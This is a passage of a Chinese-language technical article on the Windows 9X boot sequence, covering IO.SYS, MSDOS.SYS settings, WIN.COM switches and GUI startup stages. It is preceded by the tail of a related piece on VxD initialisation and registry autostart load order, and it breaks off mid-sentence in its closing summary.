在这个阶段大量的VxD进行初始化，文件的输入/输出也被允许，因此每一个VxD文件的
初始化都被记录，但Ifsmgr的设备初始化例外。Ifsmgr的作用是控制实模式文件系统，
在Ifsmgr的设备初始化过程中磁盘输入/输出不被允许，直到其初始化完成后磁盘输入/
输出才被允许进行。由于这个原因，Ifsmgr的初始化过程也没有被记录，因此从表面上
看，好像它在设备初始化阶段并没有出现。

c、SYS_INIT_COMPLETE(INITCOMPLETE,系统初始化完成）

通过这几个阶段的VxD此时一般可以正常工作了，而那些通过a、b两阶段而没有通过c阶
段的VxD将被从内存中清除。

8、加载GUI程序

在所有的静态VxD和WINSTART.BAT被加载后，Windows的GUI（Graphical User
Interface，图形用户界面）被加载，这些GUI程序是Krnl32.dll、Gdi.exe、User.exe
和Explorer.exe，其中Explorer.exe是Windows默认的Shell，可以改为使用别的应用程
序来代替。

9、Windows注册和网络注册

接下来是加载网络环境设置，即加载注册表键值
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
、Windows logon和network,此时出现询问Windows注册和网络注册密码的对话框。
Windows加载网络环境参数时提示用户输入网络注册密码，如果用户是在单机上而不是
在网络上使用计算机，并且已经关闭了密码输入提示功能，Windows将用以前提供的默
认用户名实现自动注册网络，Windows要完成自动注册功能必须满足：

（1）以前至少输入过一次有效的用户名；

（2）上次输入的用户名没有被清除；

（3）没有设置必须使用密码。

在单机用户系统上按ESC或者选择取消，Windows将会使用默认的桌面设置继续启动，但
Widows下一次启动时会再次要求输入用户名。如果网络注册验证中设置不完全正确且用
户输入了一个新的用户名，Windows将根据控制面板中的网络用户设置参数替这个用户
创造一个环境设置参数。

10、注册表主键加载

Windows中有几个自动运行的项目，它们按以下的次序加载：

(1)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunservicesOnce,

(2)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runservices,

(3)Windows的注册提示，

(4)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce,

(5)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,

(6)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,

(7)启动组，

(8)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce。

上面各项(1)、(2)和(3)可以同时加载，只有(4)的地位比较特殊，它必须等待(1)、(2)
和(3)都完成加载之后才开始加载，而在它之后的(5)、(6)、(7)和(8)也都可以同时加
载，但它们都必须等待(4)中所有的项目完成加载之后才开始加载。RunservicesOnce中
的键值在执行一次之后被自动地从注册表中清除。

经过了以上的所有步骤，Windows也就完成了其启动的全过程


Windows 9X 启动全揭秘

《一键清理系统垃圾》

Windows 9X 启动全揭秘

自WIN 95发行以来，微软公司坚持对WIN 9X系统内核技术保密，用户难以获得WIN 9X启动过程
更底层的技术资料，它始终是一个黑色的过程。掌握系统的启动过程是全面控制系统和优化系
统的关键，现在根据公开的技术资料和实践经验，仅从应用角度，对WIN 9X(包括95、96(95O
SR1)、97(95 OSR2.X)、98、98SE)的启动过程全面揭密，并对各技术细节加以必要的说明。

    WIN 9X家族主要由四个版本系列组成，其中WINDOWS 95是第一个版本，正是它开创了PC世
界新纪元，并将比尔·盖茨推向世界首富的宝座。该版本并不完善，BUG最多，在推出一个多
月后就开始提供修正软件包。

    WIN 96即WIN 95的OSR1版(称其为96，是因其发布于96年，97同此)，该版本几乎重写了W
IN 95的内核，纠正了WIN 95在实际应用中的种种问题，由于与WIN 95发布时间太近，流传不
广。

    WIN 97即WIN 95的OSR2.X，该版本发生了质的飞跃，其最大的变化是提供了新磁盘的格式
FAT 32，集成了Internet浏览器IE 3.0，这表明微软的系统发展战略开始转向因特网。OSR2.
X有三种版本，即OSR2.0、OSR2.1和OSR2.5，其中OSR2.1支持USB和AGP显卡，OSR2.5则提供了
IE4.0。由于FAT 32使OSR2.X与WIN 95和DOS不兼容，微软只将其做为OEM产品而不提供零售版
，WIN 97因此也成为WIN 95后最流行的版本。

    WIN 98是以DOS为基石的WINDOWS系列的最后辉煌。它将因特网技术和操作系统紧密结合，
同时提供了IE4.0和DirectX5.0，但没有提供更激动人心的东西，更象是WIN 97的零售版。

    WIN 98 SE是WIN 98的第二版，与WIN 98相比只是提供了IE5.0和DirectX6.1a，别无新意
。

    WINDOWS 2000是以WINDOWS NT为基础的网络操作系统，它已经是与WIN9X截然不同的产品
了，而新推出的WINDOWS Me则是WINDOWS 9X的替代产品,但除了借用WINDOWS 2000的界面外,尚
没有更新的发现。

    WIN 9X版本沿革比较复杂，其核心却保持着相对的稳定，没有根本性变化，启动过程也几
乎完全相同，这是本文存在的依据。
一、WIN 9X启动概述

    WIN 9X的启动过程继承了DOS的传统并进行了必要的扩充，主要由两个阶段组成，即扩展
的DOS实模式启动和GUI(即图形界面)32位保护模式启动，WIN 9X的技术核心集中在后一阶段中
。

    该启动过程依次由引导记录、IO.SYS、MSDOS.SYS、COMMAND.COM、CONFIG.SYS、AUTOEXE
C.BAT、GUI启动命令WIN.COM和其它必要的相关文件完成，其中与DOS的系统文件完全同名的文
件实际上发生了质的变化。

    WIN 95/96提供了彻底的双重启动功能，即用户可以用WIN 95/96和DOS(6.22以下)两种方
式启动系统，互不干扰，解决了新旧系统的兼容问题，最大限度地维护了用户的利益。但为了
逐渐摆脱落后的DOS对PC世界的影响，从WIN 97开始，微软公司尝试限制双重启动功能，使WI
N 97/98的启动系统必须修改才能实现双重启动。目前，双重启动功能在实际上的需要确已越
来越少。
    二、引导记录

    引导记录的作用是将操作系统的核心文件调入内存，以启动系统。

    所有系统的引导记录均位于磁盘的起始位置，微机加电启动时，直接从固定位置将引导记
录调入内存，引导系统启动。不同版本系统的引导记录自然不同。

    DOS引导记录的版本标志为MSDOS5.0，支持FAT 12(各版本均用于软盘或小于16M的硬盘)、
FAT 16磁盘格式，指定的系统引导文件是IO.SYS、MSDOS.SYS。

    WIN 95/96的引导记录与DOS(6.22前独立版本)的完全兼容，版本标志为MSWIN4.0，支持F
AT 12、FAT 16磁盘格式，支持双重启动，指定的引导文件是WINBOOT.SYS(IO.SYS在旧版DOS下
使用时的文件名)和IO.SYS、MSDOS.SYS。

    WIN 97/98的引导记录与DOS有了本质的区别，版本标志为MSWIN4.1，使用32位指令代码，
支持FAT 12、FAT 16和FAT 32三种磁盘格式，固定引导IO.SYS，这导致不经修改，WIN 97/98
不能直接支持双重启动。

    WIN 97/98的全新磁盘格式FAT 32可以支持大容量硬盘，取消了FAT 16的容量限制，与传
统的FAT 16完全不兼容，当然不能为DOS、WINDOWS 95/96识别。这种磁盘格式下多数原DOS、
WINDOWS 95/96软件均能正常运行，但与磁盘格式有关的软件如磁盘工具等不能继续使用。由
于主流的硬盘容量正在超过8.4G，FAT 32的应用越来越广。

三、IO.SYS

    1、IO.SYS的内部启动菜单

    WIN 9X的IO.SYS由原DOS的系统文件IO.SYS、MSDOS.SYS合并而成，提供标准硬件的输入/
输出接口和DOS的中断调用，功能全面增强，它基本上控制着WIN 9X的全部启动过程，是WIND
OWS的DOS实模式的核心文件。但它需要根据MSDOS.SYS的设置才能实现正常的启动过程。

    IO.SYS可由启动功能键改变启动过程，这些功能键对应着启动菜单各选项：

功能键 对 应 的 启 动 菜 单 项
F4： Previous MS-DOS version
F5： Safe mode
Shift+F5： Command prompt only
F6： Safe mode with network support
F8： 启动时调出启动菜单
Shift+F8： Step-by-step confirmation
系统启动出现“Starting Windows 95...”时按下功能键即可

    IO.SYS提供启动选择菜单，便于用户根据需要选择启动方式：

    ⑴Normal
    正常启动模式(默认的启动方式)
    当MSDOS.SYS中的BootWin=0时，选择本项系统将启动旧版DOS

    ⑵Logged(BOOTLOG.TXT)
    正常启动模式，同时在根目录下形成BOOTLOG.TXT
    BOOTLOG.TXT记录了启动过程中发生的所有情况，是WIN 9X系统启动过程唯一全面的诊断
记录，可供用户检查启动过程中的问题

⑶Safe mode
    安全模式的GUI，屏幕四角有“安全模式”字样不加载CONFIG.SYS、AUTOEXEC.BAT，也不
加载启动程序组中任何程序，只加载最基本硬件配置 (标准VGA模式，无声卡、光驱等)，即最
简单的GUI启动，用于纠正因硬件配置等造成的GUI启动问题。系统出现问题无法正常启动时，
多数情况下会进入该启动模式，但该模式能解决的问题非常有限，多用于显示器等配置系统配
置主要在控制面板上调整。要进入正常的GUI，必须重新启动

    ⑷Step-by-step confirmation
    单步执行 WINDOWS启动
    用于确定因系统文件损坏造成的启动故障，该方式仅能确定DOS启动过程中的系统问题，
主要修正Config.sys和Autoexec.bat中存在的问题要确定GUI启动过程中的问题，只能借助BO
OTLOG.TXT文件

    ⑸Command prompt only
    仅执行完整的实模式 DOS启动过程，进入纯DOS状态加载全部支持WIN启动的DOS驱动程序
，主要用于只能运行于纯DOS模式下的应用软件或解决严重的系统问题，可用命令WIN启动正常
的GUI

    ⑹Safe mode command prompt only最简单的 DOS启动仅执行最基本的IO.SYS、MSDOS.SY
S和COMMAND.COM三个系统文件，不加载默认驱动程序(HIMEM.SYS、IFSHLP.EXE和SETVER.EXE)
和CONFIG.SYS，AUTOEXEC.BAT，其它的环境默认值同WIN 9X 的设定，该模式无法继续启动正
常的或安全模式的GUI，主要用于处理最严重的系统故障。

    ⑺Previous MS-DOS version
    启动旧版DOS，执行双重启动根目录下应有以.DOS为扩展名保存的五个原DOS系统文件。该
选项的出现由MSDOS.SYS中的参数“BootMulti”控制注意：当MSDOS.SYS中的BootWin=0时，选
择本项将启动正常的WIN 9X系统⑻Safe mode with network support带实模式网络访问的安全
模式该选项的出现由MSDOS.SYS中的参数“NetWork”控制用于排除网络系统的PC故障，可通过
实模式网络系统，获得更大的系统支持

    2、IO.SYS提供的扩展的DOS默认配置

    IO.SYS在启动时与DOS的最大不同，是提供能满足大多数DOS应用的缺省CONFIG.SYS配置，
能够自动加载必要的驱动程序，以保证WIN 9X正常启动，具体内容如下：

    HIMEM.SYS　　　　　　　：支持1M以上内存，提供扩展内存(XMS)管理保证WIN启动的必
需文件
    DBLBUFF.SYS　　　　　　：双重缓存驱动程序，仅需要时加载，多用于支持SCSI卡
    IFSHLP.EXE　　　　　　 ：增强的文件管理驱动程序，支持WIN的VFAT系统
保证WIN启动的必需文件
    SETVER.EXE　　　　　　 ：版本登录服务，消除版本限制，仅在DOS下用
    Dblspace.bin　　　　　 ：DOS 6.0磁盘压缩驱动程序，仅在硬盘被压缩时才加载
    Drvspace.bin　　　　　 ：DOS 6.22以后的磁盘压缩驱动程序，同上
    DOS＝HIGH,UMB　　　　　：将DOS系统移入HMA，以留出更多的常规内存而UMB对系统没有
任何作用，实属摆设
    FILES＝30　　　　　　　：能打开的最大文件数，能满足大多数应用仅为DOS下使用，W
IN 9X不需要
    BUFFERS＝30　　　　　　：设置最大的磁盘缓冲区数，能满足大多数应用
仅为DOS使用，WIN 9X不需要
    FCBS＝4　　　　　　　　：文件控制块数，现已极少使用，仅为DOS使用
    LASTDRIVE＝Z　　　　　 ：最大盘符设置，该值设置过小，将无法加载光驱
    STACKS＝9,256　　　　　：设定栈数目、大小，该设置为旧程序使用WIN 9X系统不需要

    SHELL＝COMMAND.COM/P　 ：指定WIN 9X命令行处理程序

IO.SYS提供的系统环境设置如下：

命令查寻路径 ： PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
DOS提示符 ： PROMPT=$P$G
临时文件目录 ： TEMP=TMP=C:\WINDOWS\TEMP
命令行处理程序位置：COMSEPC=C:\WINDOWS\COMMAND\COMMAND.COM

    IO.SYS提供了较完善的系统配置，使取消CONFIG.SYS、AUTOEXEC.BAT成为可能。出于兼容
性考虑，IO.SYS不加载EMM386.EXE驱动，不提供扩充内存EMS和上位内存UMB。EMM386.EXE在系
统搜寻新硬件时可能引起系统死机，在日常使用时不会有问题。

    3、IO.SYS控制下的启动过程

    ⑴系统启动时，IO.SYS显示“Starting Windows 95...”，此时可由启动功能键选择启动
方式。

    ⑵IO.SYS根据启动菜单选择和MSDOS.SYS的配置确定启动模式。

    ⑶若使用原DOS系统，IO.SYS自动将DOS和WIN 9X的系统启动文件对换，然后由原DOS控制
系统启动过程。(即WIN 9X的双重启动过程最终是由IO.SYS控制完成的，与引导记录等无关)

    ⑷IO.SYS根据启动模式先由CONFIG.SYS进行系统硬件配置，若CONFIG.SYS中没有加载WIN
9X启动的必需文件(如HIMEM.SYS、IFSHLP.EXE等)，系统则根据默认设置自动加载。(如果要
加载使用扩展内存的驱动程序，如EMM386.EXE等，必须在CONFIG.SYS第一行加上HIMEM.SYS驱
动，否则由于系统此时未提供扩展内存，EMM386.EXE等程序将无法运行)

    ⑸完成CONFIG.SYS等硬件配置后，IO.SYS通过COMMAND.COM调用AUTOEXEC.BAT进行软件配
置。

    ⑹系统根目录下的BOOTLOG.TXT是由IO.SYS控制完成的，其它一些日志文件多是在安装系
统时建立的。

    ⑺完成DOS启动过程后自动调用WIN.COM，开始启动GUI。
四、MSDOS.SYS

    1、MSDOS.SYS的作用

    在WIN 9X中，MSDOS.SYS变成了纯文本系统配置文件，用于控制WIN的启动方式。可以在D
OS模式下解除其特殊属性(只读、隐藏、系统)，根据需要自行配置。MSDOS.SYS可以是空文件
，甚至可以删除，当然此时系统只能以纯DOS方式启动，不能进入GUI系统。

    不同方式形成的MSDOS.SYS默认内容不同，主要有四种，其中前三种方法形成的MSDOS.SY
S文件无任何配置命令，几乎是空文件，仅保留一行注释，以说明该文件形成方式，这类文件
多见于系统软盘中。不同的MSDOS.SYS内容如下：

1)WIN安装时建立的系统盘 : ;WIN95EBO
2)FORMAT /S建立的系统盘 : ;FORMAT
3)SYS A：传递建立系统盘 : ;SYS
4)建立系统时在硬盘上形成的MSDOS.SYS

    系统硬盘中的MSDOS.SYS内容比较完整，包括必要的启动配置命令，文件长度必须大于10
24 bytes，即占用两个以上磁盘扇区，这一要求在该文件中说明为保证兼容性，但从未见更深
入的介绍，实际上文件小于1024 bytes对系统并无明显影响，该要求估计是为了保证系统与旧
版DOS和WIN 3.X兼容而提出的，这一点尚望行家指教。

    用SYS向硬盘传送系统以修复启动文件时，将覆盖引导记录、IO.SYS和COMMAND.COM，MSD
OS.SYS的内容保持不变，保证系统引导部分修复后，整个系统仍能正常启动，这一做法非常聪
明。
2、MSDOS.SYS的配置参数

    MSDOS.SYS由三小节组成，其各配置参数无顺序要求，内容如下：
      [PATHS]　　指定WINDOWS的系统文件路径
      WinDir＝　　　　　指定WIN 9X各系统文件及其子目录所在的目录
                        该路径必须包括注册表文件SYSTEM.DAT和WIN 9X启动必需的驱动程
序，如HIMEM.SYS等
      WinBootDir＝　　　指定WIN 9X的GUI启动程序WIN.COM所在的目录
      HostWinBootDrv＝　指定WIN.COM所在的驱动器，不需冒号(:)
      UninstallDir＝　　指定保存原系统的目录，便于自身删除时恢复原系统用
                        该参数出现在WIN的升级版本中
      [OPTIONS] 指定WINDOWS的启动方式，/前的值为缺省值
      LOGO＝1/0　　　　允许/禁止启动时显示WIN 9X标志(LOGO)
                      屏蔽该画面有时可解决第三方内存管理程序造成的冲突
            看到系统启动过程出现的提示信息，也使系统启动稍快，启动
                      启动时可用ESC键清除WIN 9X标志，查看实模式启动信息
      BootKeys＝1/0　 允许/禁止启动键改变启动方式
                      为0时直接进入默认的启动方式，不能用启动热键转换
      BootGUI＝1/0　　启动图形界面GUI / 仅启动DOS 7.X，进入DOS字符界面
                      为0时可为DOS 7.X多重启动提供方便，能进一步启动图形界面
      BootWin＝1/0　　启动WIN 9X / 启动旧版DOS，可按要求对换系统文件
                      当BootWin＝0时，默认启动旧版DOS，若此时选择启动菜单的
                      “Previous MS-DOS version”，将启动WIN 9X
                      注：BootWin级别高于BootGUI，两者冲突时以前者为准
      BootMulti＝0/1　禁止/允许双重启动
                      即在启动菜单中是否出现“Previous vertion of MS DOS”项
                      从旧版DOS升级WIN 9X时会自动出现此项，并设置为
                                                    1，但对于WIN 97/98 来说，如果
不对启动系统进行修改，选择此项将造成系统下次无法启动
BootMenu＝0/1　 系统启动时是否自动显示启动选择菜单
                      该值为1，在启动时会直接弹出启动选择菜单
      Network＝0/1　　启动菜单中是否出现“带网络的安全模式启动”项
                      即“Safe mode with network support”项
      BootDelay＝n　　系统引导前显示“Starting WINDOWS 95...”时间，默认为2秒供使
用启动键改变启动方式，该值为0时不出现任何提示直接进入默认的启动过程，可加快启动速
度，但仍可用启动热键选择启动方式

      BootMenuDefault＝　启动菜单使用的默认选项，缺省值为 1
      BootMenuDelay＝　启动菜单按默认方式启动延迟间，缺省值30，单位：秒
      BootSafe＝0/1　　系统是否以安全模式启动，为1时系统直接以安全模式启动
      BootWarn＝1/0　　启动时是否显示警告信息
                      当系统非正常关机重新启动时，是否提示“应进入安全模式” 实际
上安全模式解决问题能力非常有限，真正的系统问题在该模式下是无法解决的，不进也罢
      BootConfig＝1/0　 能否使用单步配置模式，其作用不明
      DisableLog＝0/1　 在“Step-by-step config”时是否创建BOOTLOG.TXT
                      1：不选择“Logged”时不询问也不创建Bootlog.txt
                      0：询问是否创建日志文件Bootlog.txt
      SystemReg＝1/0　　系统启动时是否运行WINDOWS 9X注册器
                      1：“Step-by-step config”下询问是否运行注册器
                        其他模式则自动运行注册器
                        0：不运行也不询问是否运行WINDOWS 9X的注册器
                        该注册器在整个系统启动前首先运行，但运行与否对系统无明显影
响，其作用不明

LoadTop＝1/0　　　是否将COMMAND.COM、Drvspace.bin、Dblspace.bin等加载到高端内存，
如启动中出现内存地址冲突，可将该值设为0
                        这类冲突多由CONFIG.SYS、AUTOEXEC.BAT加载的程序造成Autosca
n＝1/0
                        非正常关机(如掉电等)再启动时，是否自动执行SCANDISK
                        (仅在WIN 97/98有效)
                        取消自动检测硬盘固然可以免除一些烦恼，但确实给系统带来了隐
患，还是不关闭的好

      DoubleBuffers＝1/2/0 　是否加载BDLBUFF.SYS，提供双重缓存支持
                            0：不提供；1：需要时提供，如有SCSI卡等；
                            2：无条件提供双重缓存
      DblSpace＝1/0　　　允许需要时自动加载DblSpace.bin压缩驱动(DOS6.0、6.2)
      DrvSpace＝1/0　　 允许自动加载DrvSpace.bin压缩盘驱动(DOS6.22、WIN 9X)
                        压缩硬盘降低了系统整体性能，更增加了数据的危险性
                        在硬盘容量已不成问题的今天，还是不用压缩为妙
                        注意，FAT32不支持任何磁盘压缩软件
      WinVer＝　　　　　注明WINDOWS版本正式推出日期

第三部分由以分号“;”开头的数行任意字符组成，在MSDOS.SYS中属于注释行，对系统不起任
何设置作用，主要用于保证MSDOS.SYS文件长度大于1024字节。

    MSDOS.SYS提供的参数多数是用于调整系统使用的，对于普通用户来说，常用的主要包括
NetWork前的几个参数。

五、COMMAND.COM

    COMMAND.COM是WINDOWS 9X中的DOS外壳程序(SHELL)，较DOS 6.22仅增加了部分内部命令
，没有更新的东西。

    IO.SYS对COMMAND.COM的处理则有了根本改变，当WIN 9X在CONFIG.SYS中加载EMM386.EXE
驱动提供UMB时，COMMAND.COM的常驻部分装入HMA，暂驻部分装入UMB中(在DOS6.22中，COMMA
ND.COM只能将常驻部分装入HMA)，这将为DOS程序提供更大的常规内存，也不需要反复从磁盘
中恢复暂驻部分，有效地提高了系统性能。当然，如果没有加载EMM386.EXE，系统不提供UMB
，COMMAND.COM的暂驻部分就只能象DOS6.22那样置于常规内存的高端。

六、CONFIG.SYS和AUTOEXEC.BAT

    WIN 9X中的CONFIG.SYS、AUTOEXEC.BAT的作用与DOS的一样，用于装配所有DOS实模式的驱
动程序和应用程序，或者修改IO.SYS的默认配置。其中，CONFIG.SYS主要用于硬件配置，AUT
OEXEC.BAT主要用于软件配置，其在启动过程中的使用参见IO.SYS一节。

    WIN 9X启动后，这两个文件的配置作为全局设置始终保留在系统底层，决定着WIN 9X下所
有的DOS、WIN 16应用环境。如果没有DOS全局设置，WINDOWS窗口下的DOS应用程序将使用WIN
9X的默认设置，当然也可由用户单独配置。注意，DOS软件需要的PATH、SET等环境设置可在
各自窗口的属性中单独设置；16位的WIN 3.X软件需要的PATH、SET等环境设置只能在AUTOEXE
C.BAT中设置。

    WIN 9X新增了不少配置命令，使实模式DOS环境更便于优化，各配置命令参见系统目录\W
INDOWS下的CONFIG.TXT说明，这里不再多说。 WIN 9X通过VXD(虚拟设备驱动)、DLL(动态链接
库)等保护模式驱动程序统一管理和使用系统软、硬件资源，基本上不需要实模式程序支持。
实模式程序主要是为支持一些老设备而保留的。实模式程序的存在使WIN 9X必须在保护模式和
实模式之间频繁地转换，大大降低了系统性能，更损害了系统稳定性，所以应尽量避免在启动
时装载实模式程序。

    WIN 9X对DOS环境的缺省设置能满足大多数DOS软件需要，在完成WIN 9X安装后试着删除这
两个文件中的内容非常必要。删除其中的实模式程序，尽量实现WIN 9X的保护模式驱动，可使
WIN 9X处于高性能、高稳定性的优化运行状态。

    没有CONFIG.SYS、AUTOEXEC.BAT的DOS系统几乎一无所能，而没有它们的WIN 9X性能也许
更好。在WIN 9X中它们主要是为支持原DOS软件和古老的设备而保留的。目前多数报章建议完
全删除这两个文件，这其实很有问题，具体分析参见《电脑界·电脑高手》''99年10月号。

七、WIN.COM

    WIN.COM是WINDOWS的GUI启动命令，从文件名可以看出这是一个纯粹的DOS命令，它也是G
UI系统中唯一的COM文件。该命令是DOS和GUI的接口命令，主要用来加载保护模式的虚拟设备
驱动程序VMM32.VXD(该程序是由多个子程序组合而成的，使CPU运行于保护模式下)，同时处理
GUI启动中的各种问题，它控制着系统的整个调入过程。

     WIN.COM提供的各类启动开关，主要用于确定系统故障，会使系统性能降低：
WIN [/D: [F][M][S][V][X]]

/D 当WINDOWS不能正常启动时用于查找故障原因

:F 关闭32位磁盘存取模式，用于不支持32位存取的硬盘
等价于在SYSTEM.INI的[386ENH]节中设定: 32BitDiskAccess=FALSE.

:M 安全模式启动，等价于使用功能键F5启动

:N 带实模式网络支持的安全模式启动，等价于使用功能键F6启动

:S 禁止Windows使用在F000:0000与1 MB之间的ROM地址空间做为断点
等价于在SYSTEM.INI的[386ENH]节中设定: SystemROMBreakPoint=FALSE.

:V 指定启动时由ROM例程处理硬盘控制器中断
等价于在SYSTEM.INI的[386ENH]节中设定: VirtualHDIRQ=FALSE.

:X 禁止WINDOWS使用所有高端内存(从A000-FFFF)，解决内存冲突问题
等价于在SYSTEM.INI的[386ENH]节中设定: EMMExclude=A000-FFFF.

八、GUI启动

    WIN 9X的GUI启动过程是非常复杂，更是微软公司的核心秘密，不为外人所知。而对普通
用户而言，完全掌握这个复杂多变的机制也无必要，这里只对整个GUI启动机制做一个大致的
说明。

    1、GUI的配置文件

    同所有复杂的系统一样，WIN 9X主要是根据系统配置文件调用各类程序来组合系统，保证
系统正常运行的。WIN 9X的GUI系统配置文件以系统注册表为核心，以各系统目录下的INI文件
为辅助配置。把握住系统配置文件，就掌握了系统的核心。

    GUI系统的核心配置文件主要有5个，即：WIN.INI、SYSTEM.INI、SYSTEM.DAT、USER.DAT
和POLICES.DAT。

    WIN.INI和SYSTEM.INI据说是为WIN 3.X下的WIN 16保护模式程序保留的，WIN 3.X在这两
个文件中的设置在WIN 9X中大部分已移入系统注册表中。WIN 9X下WIN 32保护模式程序主要通
过系统注册表完成配置，不需要这两个文件的支持。这一做法规范了应用程序的开发和使用，
消除了随意设置INI文件的混乱，便于WIN 9X统一管理系统，增加了系统的稳定性。但如果删
除这两个文件，WIN 9X系统无法启动，并提示“找不到SYSTEM.INI文件”，这说明WIN 9X的启
动还是离不开这两个文件的。

    WIN.INI提供了WIN 16程序需要的字体设置、文件关联等种种信息，主要完成GUI下相应的
环境配置，对WIN 9X应用没有太大影响，如果没有这个文件，WIN 9X将自动生成一个最简单的
只有几行配置命令的WIN.INI。

    SYSTEM.INI则不同，它是WIN 16的系统硬件配置文件，WIN 9X又为其增加了一些新设置，
以保证WIN 16和WIN 32相互协调，使WIN 16可以调用VXD驱动程序，这一点在WIN.COM提供的系
统调试参数中已有充分体现。另外GUI的外壳程序(SHELL，即界面程序)、鼠标器、显示器等驱
动程序必须通过SYSTEM.INI设置才能加载使用，这些决定了SYSTEM.INI是绝对不能删除的。这
充分证明了WIN 9X是一个WIN 16和WIN 32的混合系统，也揭示了WIN 9X系统先天脆弱的根本原
因。

    WIN.INI、SYSTEM.INI中的各项设置可参见《新潮电子精华本1》。

    SYSTEM.DAT和USER.DAT即所谓的系统注册表文件，是WIN 9X的核心文件，WINDOWS就是通
过它来管理整个系统的。SYSTEM.DAT保存着硬件配置及软件安装信息，USER.DAT保存着与用户
的个人设置有关的信息，前者只能有一个，而后者可以有多个。这两个文件共同作用，包含了
系统的全部信息，在使用注册表编缉软件(如REGEDIT.EXE)时，这两个文件共同被修改，不能
分开。它们的损坏将导致系统彻底瘫痪，无法挽救。不幸的是，系统注册表非常脆弱，缺乏自
我整理和维护机制，当系统运行一段时间后，用户往往只能走上痛苦的系统重建之路。

    在WIN 95/96/97中，注册表的备份为SYSTEM.DA0和USER.DA0，保存在\WINDOWS下；在WIN
98中，WIN.INI、SYSTEM.INI、SYSTEM.DAT和USER.DAT四个文件被合并备份成一个文件RB00?
.CAB，保存在\WINDOWS\SYSBCKUP下，默认保留5个。

    每次GUI启动时系统会对备份文件自动更新，这种处理缺乏安全管理机制，难以保证备份
文件不受错误信息干扰，多数情况下备份文件形同虚设。

    令人遗憾的是，除了手工编缉注册表软件REGEDIT.EXE，WIN 9X没有提供更有效的注册表
维护工具。在WIN 98提供了注册表检测软件ScanReg.exe和ScanRegw.exe，这是一个进步，但
它只能处理注册表的物理故障，无法解决结构性问题，其可*性又有多大呢？

    博大的注册表完全应该用一本专著来剖析，在《新潮电子精华本1》中也有简单的介绍，
这里就不做更深的解释了。

    POLICES.DAT是微软的MSN(Microsoft Network)注册支持文件，该网络国内用户很少，该
文件也很少使用。

    尽管没有更直接的资料介绍，但是有充分的理由证明在WIN 9X的启动过程中，保存在\WI
NDOWS\INF目录下的各种INF文件是WIN 9X系统中最有力的支持文件。在启动系统的过程中，W
IN 9X会适时地调用这些文件，以装载相应的驱动程序。如果没有了这些文件，WIN 9X也是无
法启动的。另外，WIN 9X的PNP技术主要是通过INF文件实现驱动程序安装的。

    2、GUI的启动过程

    GUI的启动过程主要由三个阶段组成：WININIT.EXE阶段、16位保护模式启动和32位保护模
式启动。

    ⑴WININIT.EXE阶段WIN.COM开始运行后，首先调用\WINDOWS下的WININIT.EXE，该命令在
同目录下寻找WININIT.INI，如果有则按照该文件配制对系统文件进行重新调整或升级，以保
证整个系统的驱动程序能够得到及时更新。这是WINDOWS系统支持PNP技术，实现系统驱动程序
升级的主要途径。这个过程自然是在DOS状态下完成的。

    ⑵16位保护模式启动

    WIN.COM开始执行后，调入\WINDOWS\SYSTEM下的VMM32.VXD，VMM32.VXD将处理器置于保护
模式下，根据SYSTEM.INI和注册表的配置开始启动GUI系统的16位保护模式。这可以保证系统
支持WIN16软件，更主要的是PNP BIOS(即插即用BIOS)规范只提供16位保护模式接口，以PNP为
硬件技术核心的WIN 9X必须通过16位模式直接获得BIOS提供的硬件设备信息来配置系统，提高
系统启动性能，否则对硬件的配置必须在实模式下从头开始。

    GUI的启动首先加载WIN 9X的系统驱动程序，再从PNP BIOS获得硬件设备信息，先后加载
PNP设备驱动程序VXD和支持非PNP硬件所需的全部16位虚拟保护模式驱动程序VXD，分配系统资
源，避免设备冲突，然后初始化所有的驱动程序(包括系统驱动程序和设备驱动程序)，完成系
统硬件配置。最后加载16位外壳组件USER.EXE、GUI.EXE、KRNL386.EXE等，形成WIN16的API，
完成16位保护模式启动，此时，每个系统组件都已存在，但还不具使用界面。

    ⑶32位保护模式启动

    完成16位模式启动后，系统调用32位的外壳程序资源管理器，16位内核一看到这一调用，
就先自动加载VWIN32.386，由它加载三个32位DLL库文件：USER32.DLL、GDI32.DLL、KERNEL3
2.DLL，形成WIN32的API(这是WIN 9X的核心)，VWIN32.386完成这一任务后，将控制权还给16
位内核，16位内核再将控制权交给32位内核，开始32位保护模式启动。这时系统加载并初始化
所有32位驱动程序，这个过程与16位模式相同。

    最后，运行GUI的外壳程序(该外壳程序由SYSTEM.INI中的[BOOT]节中“SHELL=”设置，默
认是资源管理器)，完成GUI启动。

3、GUI启动过程中故障的排除

    GUI系统相当复杂，相关的技术资料却极少，这决定了用户不能象在DOS中那样根据启动过
程去排查故障。

    WIN 9X对GUI的启动过程从未提供详尽的说明，仅在根目录下提供了一份启动日志文件BO
OTLOG.TXT。该文件记录了启动过程使用的所有程序模块的加载情况，是解决系统问题的唯一
依据。根据该记录可以全面了解GUI启动过程中发生的种种问题。

    面对启动过程中的失败，主要有两个处理方法，一是用完好的源程序覆盖出现问题的程序
，但其难点在于如何在各类软件包中找到那些完好的源程序，注意，直接调试、修复出现问题
的程序在WIN 9X下是难以想象的；一是从启动配置文件(CONFIG.SYS、AUTOEXEC.BAT、WIN.IN
I、SYSTEM.INI和注册表)中删除调用有问题模块的命令。后者主要用于解决某软件卸载失败出
现的问题。

    在图形模式GUI下解决系统问题时多会受到种种限制，而纯DOS模式不受系统制约，是最后
的系统之门(对于电脑高手来说，DOS仍是永恒的主题)。

    WINDOWS系统的复杂性决定了排除那些莫名其妙的故障的难度，若对系统经过几次调整后
仍未解决问题，最保险也是最快捷的办法就是重新安装系统。也许这是微软对用户唯一有用的
建议。

    在WINDOWS下重新安装系统，要保证产品的序列号一致，否则系统可能拒绝安装。

    九、WIN 9X启动顺序小结

    本文详尽地讨论了WIN 9X的启动过程，复杂的参数和技术分析模糊了其清晰的体系结构，
现在对整个启动过程做一简单的概括，使读者根据启动过程中的现象能够相对准确地判断启动
过程，更好地处理系统启动过程中的问题。

    ⑴系统加电启动，依次加载扩展卡(包括显卡等)、主板的BIOS程序(这与所有的操作系统
